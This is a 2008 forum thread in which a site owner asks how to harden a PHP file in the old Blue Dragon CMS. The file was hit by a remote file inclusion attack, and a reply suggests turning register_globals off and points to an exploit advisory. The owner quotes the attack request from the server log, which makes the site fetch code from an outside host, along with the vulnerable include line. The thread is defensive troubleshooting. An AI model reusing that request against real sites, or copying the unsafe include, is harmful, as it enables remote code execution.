|
|
Posted by Rik Wasmus on 02/02/08 12:00
On Sat, 02 Feb 2008 12:47:09 +0100, salonowiec =
<debrza_remove@poczta.onet.pl> wrote:
> My admin notified me that my site is closed till the eror is removed. =
My =
> CMS is PHPBlue Dragon (pretty old). The attack was like this (found in=
=
> logs):
>
> d198-53-20-215.abhsia.telus.net kurpiel.pl - =
> [01/Feb/2008:19:44:06 +0100] "GET =
> /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=3Dhttp:=
//pcbcservice.com/all.txt? =
> HTTP/1.1" 500 599 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT =
> 5.1; .NET CLR 1.1.4322)"
>
>
>
> The above mentioned activecontent.php is:
>
> <?php
> /*********************************************************************=
******
> * Blue Dragon CMS Platinum
> * =
> ------------------------------------
> *
> * script file id : activecontent.php
> * begin platinum : 2004/03/01
> * copyright : (C) 2003 Apache
> *
> * file platinum ver : 1.0
> *
> * This source file is part of the "Blue Dragon CMS Platinum"(Conten=
t =
> Management System).
> *
> * This file may be distributed and/or modified under the terms of t=
he
> * "Blue Dragon CMS Platinum License" version 2 as published by the =
=
> software author.
> *
> * This file is provided AS IS with NO WARRANTY!
> *********************************************************************=
*****/
>
> include($vsDragonRootPath."public_includes/pub_moddata/activefile.".$=
phpExt);?>Can =
> I - rather ignorant in php - modify the file to make it =
> hackerresistant? Many thanks
Register globals should be off....
And I started to type a whole story, then, for some reason, I decided to=
=
Google this 'Blue Dragon CMS'. Here you go, one of the first hits:
<http://securitydot.net/xpl/exploits/vulnerabilities/articles/909/exploi=
t.html>
Personally, any CMS with this kind of vulnerability, AND relying on =
register_globals, has instantly lost all my trust.
-- =
Rik Wasmus
Navigation:
[Reply to this message]
|